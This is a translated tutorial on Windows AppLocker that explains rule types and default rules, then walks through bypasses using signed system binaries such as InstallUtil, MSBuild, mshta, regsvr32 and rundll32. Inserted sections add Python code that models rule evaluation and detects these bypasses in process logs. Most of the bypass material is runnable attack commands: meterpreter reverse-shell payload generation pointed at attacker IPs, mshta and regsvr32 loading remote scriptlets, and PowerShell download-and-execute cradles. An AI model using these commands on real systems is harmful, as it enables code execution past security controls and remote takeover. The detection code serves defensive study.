2025-04-07 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 05/31 Report
This article walks through an analysis of AppLocker bypass techniques. The content is fairly detailed, and readers who are interested can use it as a reference.
Preface: what is AppLocker
AppLocker (the "application control policy") is a security feature introduced with Windows 7 and integrated by default in Windows 7 and later. To use it, enable the Application Identity service under Services, then open Application Control Policies in the Local Security Policy console, where the AppLocker node appears.
AppLocker rules
The default AppLocker rule collections cover the following file types:
Rule collection | Associated file formats
Executable | .exe, .com
Script | .ps1, .bat, .cmd, .vbs, .js
Windows Installer | .msi, .msp, .mst
Packaged app and packaged app installer | .appx
DLL | .dll, .ocx
The packaged app (.appx) collection is not present on every Windows version. On Windows 10, once an AppLocker rule has been created, the corresponding .applocker policy files are written to C:\Windows\System32\AppLocker.
AppLocker rule conditions
Rule conditions are the criteria AppLocker uses to identify the application a rule applies to. The three main rule conditions are publisher, path, and file hash:
Publisher: identifies the file by its digital signature
Path: identifies the file by its location on the local file system or on the network
File hash: identifies the file by a cryptographic hash that the system computes over its contents
AppLocker default rules
When you create the first AppLocker rule, you are asked whether the default rules should be created as well, as shown in the following figure:
The default rules for each collection are as follows.
The default rules for executables are:
Allow members of the local Administrators group to run all applications.
Allow members of the Everyone group to run applications in the Windows folder.
Allow members of the Everyone group to run applications in the Program Files folder.
The default rules for scripts are:
Allow members of the local Administrators group to run all scripts.
Allow members of the Everyone group to run scripts in the Program Files folder.
Allow members of the Everyone group to run scripts in the Windows folder.
The default rules for Windows Installer are:
Allow members of the local Administrators group to run all Windows Installer files.
Allow members of the Everyone group to run all digitally signed Windows Installer files.
Allow members of the Everyone group to run all Windows Installer files in the Windows\Installer folder.
The default rules for DLLs are:
Allow members of the local Administrators group to run all DLLs.
Allow members of the Everyone group to run DLLs in the Program Files folder.
Allow members of the Everyone group to run DLLs in the Windows folder.
The default rule for packaged apps is:
Allow members of the Everyone group to install and run all signed packaged apps and packaged app installers.
AppLocker rule behavior
Rules can be configured with either an allow or a deny action:
Allow: you specify which files may run in your environment and which users or groups the rule targets. You can also configure exceptions to identify files that are excluded from the rule.
Deny: you specify which files may not run in your environment and which users or groups the rule targets. Exceptions can be configured in the same way.
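To make the default rules and the allow/deny semantics concrete, here is a small Python model of AppLocker path-rule evaluation. It is an added example, not code from the article or from Microsoft; the %WINDIR%/%SYSTEM32%/%PROGRAMFILES% expansions, the group names and the file paths are constructed for it. It relies on one fact the article does not spell out: AppLocker applies an explicit deny before any allow, and a file that matches no allow rule is blocked. It also goes one step beyond the article by adding a defender's rule set: deny rules for the signed utilities under the Windows folder that the bypass sections below rely on, which the default "Everyone may run anything in the Windows folder" rule would otherwise cover.

```python
"""Toy model of AppLocker path-rule evaluation (added example, not from the article).

Assumptions, all constructed for this example: the variable expansions in
PATH_VARS, the group names, and the sample file paths. Fact relied on: an
explicit deny rule wins over allow rules, and a file no allow rule covers is blocked.
"""
from __future__ import annotations

from dataclasses import dataclass
from fnmatch import fnmatchcase

# Assumed expansions of the path variables used by the default rules.
PATH_VARS = {
    "%WINDIR%": r"C:\Windows",
    "%SYSTEM32%": r"C:\Windows\System32",
    "%PROGRAMFILES%": r"C:\Program Files",
}


@dataclass(frozen=True)
class PathRule:
    action: str   # "allow" or "deny"
    group: str    # group the rule targets, e.g. "Everyone" or "Administrators"
    path: str     # AppLocker-style path pattern; "*" matches any sub-path

    def matches(self, file_path: str, groups: set[str]) -> bool:
        """True when the user is in the targeted group and the path pattern fits."""
        if self.group not in groups:
            return False
        pattern = self.path
        for var, value in PATH_VARS.items():
            pattern = pattern.replace(var, value)
        # fnmatch treats "\" literally, so Windows paths compare as plain text.
        return fnmatchcase(file_path.lower(), pattern.lower())


def evaluate(file_path: str, groups: set[str], rules: list[PathRule]) -> tuple[str, PathRule | None]:
    """Decide whether file_path may run for a user who is in `groups`.

    Returns ("deny", rule) for an explicit deny, ("allow", rule) for an allow,
    and ("deny", None) when no rule matches (AppLocker's implicit deny).
    """
    hits = [r for r in rules if r.matches(file_path, groups)]
    for rule in hits:
        if rule.action == "deny":      # explicit deny always wins
            return "deny", rule
    for rule in hits:
        if rule.action == "allow":
            return "allow", rule
    return "deny", None


# The executable default rules as listed in the article.
DEFAULT_EXE_RULES = [
    PathRule("allow", "Administrators", "*"),
    PathRule("allow", "Everyone", r"%WINDIR%\*"),
    PathRule("allow", "Everyone", r"%PROGRAMFILES%\*"),
]

# The article's example rule: block executables on the desktop (path constructed).
DESKTOP_DENY_RULE = PathRule("deny", "Everyone", r"C:\Users\*\Desktop\*")

# Defender's counter-measure (beyond the article): deny the signed utilities
# under the Windows folder that the bypass sections use, so the %WINDIR%
# allow rule no longer covers them. Deny wins even for Administrators.
LOLBIN_DENY_RULES = [
    PathRule("deny", "Everyone", r"%WINDIR%\Microsoft.NET\*\InstallUtil.exe"),
    PathRule("deny", "Everyone", r"%WINDIR%\Microsoft.NET\*\MSBuild.exe"),
    PathRule("deny", "Everyone", r"%SYSTEM32%\mshta.exe"),
    PathRule("deny", "Everyone", r"%SYSTEM32%\regsvr32.exe"),
]

INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
DESKTOP_EXE = r"C:\Users\bob\Desktop\exeshell.exe"


if __name__ == "__main__":
    everyone = {"Everyone"}
    admin = {"Everyone", "Administrators"}
    print(evaluate(DESKTOP_EXE, everyone, DEFAULT_EXE_RULES + [DESKTOP_DENY_RULE]))  # deny
    print(evaluate(INSTALLUTIL, everyone, DEFAULT_EXE_RULES))                          # allow
    print(evaluate(INSTALLUTIL, admin, DEFAULT_EXE_RULES + LOLBIN_DENY_RULES))         # deny
```

The second call is the whole story of the bypass sections: with only the default rules, InstallUtil.exe is allowed for Everyone simply because it sits under the Windows folder. The third call shows the fix; once a deny rule names the binary, the Administrators "allow everything" rule no longer rescues it.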
Creating an AppLocker rule
With that background, let's create a rule that blocks running .exe files from the desktop as an example. The creation steps are roughly as follows:
Run an .exe to test:
The system blocks it from running.
Bypassing AppLocker
InstallUtil.exe
InstallUtil, part of the .NET Framework, is a command-line utility that lets users quickly install and uninstall applications from the command prompt. Because it is a Microsoft-signed binary, it can be used to bypass AppLocker restrictions and run any .NET executable. The utility also lives under the Windows folder, which the AppLocker default rules do not restrict because the system needs the contents of that folder in order to function.
First we use WhiteListEvasion (https://github.com/khr0x40sh/WhiteListEvasion) to generate a template:
python InstallUtil.py -cs_file pentestlab.cs -exe_file /root/Desktop/pentestlab.exe -payload windows/meterpreter/reverse_https -lhost 192.168.0.103 -lport 443
The command above generates a C# template containing the Metasploit shellcode.
Run the generated file on the target as follows:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U /root/payload.exe
Alternatively, you can generate a C# payload with msfvenom, replace the shellcode in the template, and transfer the .cs file to the target.
Then compile the source with csc:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:exeshell.exe exeshell.cs
At this point, let's try to execute the file directly:
It is blocked by the rule, so we run it through InstallUtil instead:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe
Bypassed:
The Metasploit session is established.
Metasploit also ships an AppLocker bypass module that uses InstallUtil.exe:
exploit/windows/local/applocker_bypass
The principle is the same.
Common paths:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
MSBuild.exe
MSBuild.exe (the Microsoft Build Engine) is the software build platform used by Visual Studio. It uses XML project files that define the requirements for building various platforms and configurations. (Reference: MSDN, MSBuild.)
We can use MSBuild to proxy code execution through a trusted Windows utility. The inline task feature introduced in .NET 4 allows C# code to be embedded in an XML project file; MSBuild compiles and executes that inline task. Because MSBuild.exe is a signed Microsoft binary, used this way it can execute arbitrary code and bypass an application whitelist configured to allow MSBuild.exe to run.
Here we use GreatSCT to generate the XML file directly:
./GreatSCT.py --ip 192.168.0.106 --port 4444 -t bypass -p msbuild/meterpreter/rev_tcp.py
It also generates an .rc file, so msfconsole -r can start the handler directly.
Then execute the project with MSBuild:
The Metasploit session is established:
Alternatively, generate C# shellcode with msfvenom and load it with the template from 3gstudent:
https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20shellcode.xml
Note that the file extension must be changed to .csproj.
Besides reverse shells, MSBuild can also be used to get around restrictions on PowerShell.
The code (the tail of the inline task's C# body) is as follows:
    results = pipeline.Invoke();
    runspace.Close();
    // Convert the records to strings
    StringBuilder stringBuilder = new StringBuilder();
    foreach (PSObject obj in results) {
        stringBuilder.Append(obj);
    }
    return stringBuilder.ToString().Trim();
}
public static void RunPSFile(string script) {
    PowerShell ps = PowerShell.Create();
    ps.AddScript(script).Invoke();
}
}
]]>
Original address: https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20PowerShellCommands.xml
The restriction on PowerShell is bypassed successfully.
Common paths are as follows:
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v3.5\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
mshta.exe
mshta.exe is a Microsoft Windows program whose full name is Microsoft HTML Application host; it is used to execute .hta files and is on the PATH by default.
There are many ways to use mshta. Here we test with Metasploit's exploit/windows/misc/hta_server module:
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
Execute on the target machine:
mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta
The session comes back.
Besides this method, HTA payloads can also be generated with Cobalt Strike, SEToolkit, Magic Unicorn, Empire, CactusTorch, Koadic, GreatSCT, and others.
In addition to local files, mshta can also load a remote payload, for example:
mshta.exe javascript:a=GetObject("script:https://gist.github.com/someone/something.sct").Exec();close();
mshta can also be used to run PowerShell:
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/')"
This works even when AppLocker has blocked PowerShell execution.
InfDefaultInstall.exe
InfDefaultInstall.exe is a Microsoft-signed tool for installing .inf files. It exists at:
C:\Windows\System32\InfDefaultInstall.exe
C:\Windows\SysWOW64\InfDefaultInstall.exe
We can also use it to get around some restrictions. The usage is simply the binary followed by your .inf file.
Its execution flow is as follows:
The PoC published by the author is here:
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
The idea is the same as in the figure: shady.inf calls a remote .sct backdoor.
However, this call requires higher privileges. Here is a screenshot of running it on Windows 10:
mavinject.exe
mavinject is a built-in Windows component on Windows 10 and later that can be used for DLL injection, and therefore to bypass some restrictions.
The usage is as follows:
mavinject32.exe
Common paths are as follows:
C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
C:\Windows\System32\mavinject.exe
C:\Windows\SysWOW64\mavinject.exe
However, my local reproduction did not inject successfully, and there was no error message, so I do not know the specific reason. The version was 10.0.15063.0 (WinBuild.160101.0800).
It should work; here is a screenshot of a successful run posted on Twitter.
If you are interested, you can try it on a few more systems.
msiexec
msiexec is a Microsoft program for installing or configuring products from the command line. It is not unfamiliar; I have also written articles about using it for privilege escalation. Here we use the fact that .msi files can be executed to bypass AppLocker's restriction on PowerShell.
First generate an .msi file with msfvenom:
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
Execute it on Windows:
Bypassed successfully.
msxsl.exe
msxsl.exe is an XML transformer carrying a Microsoft digital signature. The download address is:
https://www.microsoft.com/en-us/download/details.aspx?id=21714
We use 3gstudent's method to try to bypass AppLocker's restriction on calc.
customers.xml (element text only):
John Smith, 123 Elm St., (123) 456-7890
Mary Jones, 456 Oak Ave., (156) 789-0123
script.xml:
function xml(nodelist) {
    var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
    return nodelist.nextNode().xml;
}
Bypassed successfully:
Of course, it can also execute our shellcode. For details see:
https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
regsvr32.exe
regsvr32 is a Windows command-line utility that registers and unregisters .dll files and ActiveX controls in the registry.
File locations:
C:\Windows\System32\regsvr32.exe
C:\Windows\SysWOW64\regsvr32.exe
The following demonstrates bypassing AppLocker to get a session.
The .sct file is as follows:
The meaning of each parameter:
/s: silent, does not display any messages
/n: do not call DllRegisterServer
/i: call DllInstall with the given argument (used here because /n skips DllRegisterServer)
/u: unregister
In addition to local execution, it also supports remote loading:
regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll
GreatSCT can be used to generate the .sct file.
rundll32.exe
rundll32 is a Microsoft binary that executes code in DLL files. Because this utility is part of the Windows operating system, it can be used to bypass AppLocker rules or software restriction policies.
Generate our payload:
Execute on the target machine:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";[xss_clean]();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');")
The session comes back:
Besides the remote variant, a local DLL can also be used:
rundll32 shell32.dll,Control_RunDLL C:\Users\pentestlab.dll
It can also be used to bypass restrictions on other software, for example launching cmd:
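The bypasses in the InstallUtil, MSBuild, mshta, InfDefaultInstall, msiexec, msxsl, regsvr32 and rundll32 sections all leave the same trace: a signed Windows binary launched with a command line it has no business carrying (an .exe handed to InstallUtil /U, a project file from a user directory handed to MSBuild, a URL or javascript: handed to mshta or rundll32, scrobj.dll with /i: handed to regsvr32). The following Python is an added detection example, not code from the article or from any of the tools it cites; the event format (pipe-separated Image/CommandLine/ParentImage fields in the style of a Sysmon process-creation event) and the sample events are constructed, with the command lines taken from the sections above.

```python
"""Detect the living-off-the-land AppLocker bypasses from this article in
process-creation records (added example, not from the article or its tools).

Event format and sample events are constructed: one event per line, fields
separated by "|", each field "Key=Value" in the style of a Sysmon
process-creation event (Image, CommandLine, ParentImage).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Signature:
    name: str
    image: str            # lower-case basename of the launched binary
    command: re.Pattern   # searched in the full command line


# One signature per binary, matching the command-line shape each section shows.
SIGNATURES = [
    Signature("installutil_uninstall_of_untrusted_assembly", "installutil.exe",
              re.compile(r"/u\b.*\.(exe|dll)\b", re.I)),
    Signature("msbuild_inline_task_project", "msbuild.exe",
              re.compile(r"\.(csproj|xml|proj)\b", re.I)),
    Signature("mshta_remote_or_script_uri", "mshta.exe",
              re.compile(r"https?://|javascript:|vbscript:", re.I)),
    Signature("infdefaultinstall_inf_from_user_path", "infdefaultinstall.exe",
              re.compile(r"\\users\\.*\.inf\b", re.I)),
    Signature("msiexec_package_from_user_path", "msiexec.exe",
              re.compile(r"\\users\\.*\.msi\b", re.I)),
    Signature("msxsl_script_transform", "msxsl.exe",
              re.compile(r"\.xml\s+\S*\.xml\b", re.I)),
    Signature("regsvr32_scrobj_remote_sct", "regsvr32.exe",
              re.compile(r"(?=.*scrobj\.dll)(?=.*/i:\s*\S+)", re.I)),
    Signature("rundll32_javascript_or_user_dll", "rundll32.exe",
              re.compile(r"javascript:|\\users\\.*\.dll\b", re.I)),
]


def parse_event(line: str) -> dict:
    """Split 'Key=Value|Key=Value' into a dict; values keep their own '=' signs."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def match_event(event: dict) -> list:
    """Names of the signatures whose image and command-line pattern both fit."""
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    return [s.name for s in SIGNATURES if s.image == image and s.command.search(cmd)]


def scan(lines) -> list:
    """Return (signature, image, parent) triples for every suspicious event."""
    hits = []
    for line in lines:
        event = parse_event(line)
        for name in match_event(event):
            hits.append((name, event.get("Image", ""), event.get("ParentImage", "")))
    return hits


# Constructed sample events; command lines follow the article's sections.
# Events 3 and 6 are benign uses of the same binaries and must not fire.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe|CommandLine=InstallUtil.exe /logfile= /LogToConsole=false /U exeshell.exe|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|CommandLine=msbuild.exe C:\Users\bob\payload.csproj|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|CommandLine=MSBuild.exe C:\Build\app.sln /p:Configuration=Release|ParentImage=C:\Program Files\Jenkins\jenkins.exe",
    r"Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://192.168.0.106:8080/JR1gb3TO6.hta|ParentImage=C:\Windows\System32\cmd.exe",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s C:\Windows\System32\example.dll|ParentImage=C:\Windows\System32\msiexec.exe",
    r'Image=C:\Windows\System32\rundll32.exe|CommandLine=rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";new ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass")|ParentImage=C:\Windows\System32\cmd.exe',
    r"Image=C:\Windows\System32\msiexec.exe|CommandLine=msiexec /q /i C:\Users\bob\powershell.msi|ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Users\bob\Downloads\msxsl.exe|CommandLine=msxsl.exe customers.xml script.xml|ParentImage=C:\Windows\System32\cmd.exe",
]


if __name__ == "__main__":
    for name, image, parent in scan(SAMPLE_EVENTS):
        print(f"{name}: {image} (parent {parent})")
```

The signatures deliberately key on the argument shape rather than on the binary alone, because every one of these binaries has legitimate uses (MSBuild on a build server, regsvr32 during an installer run); the two benign events in the sample set exercise exactly that distinction. Pairing a hit with a parent image of cmd.exe, explorer.exe or an Office process, as the sample events do, is what usually turns a match into an alert worth paging on.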
That concludes this analysis of AppLocker bypasses. I hope the content above is of some help and lets you learn something new. If you found the article useful, please share it so more people can see it.